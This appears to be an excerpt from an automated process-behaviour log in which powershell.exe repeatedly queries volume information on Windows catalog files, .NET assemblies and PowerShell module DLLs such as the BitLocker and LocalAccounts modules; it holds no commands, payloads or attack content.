Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
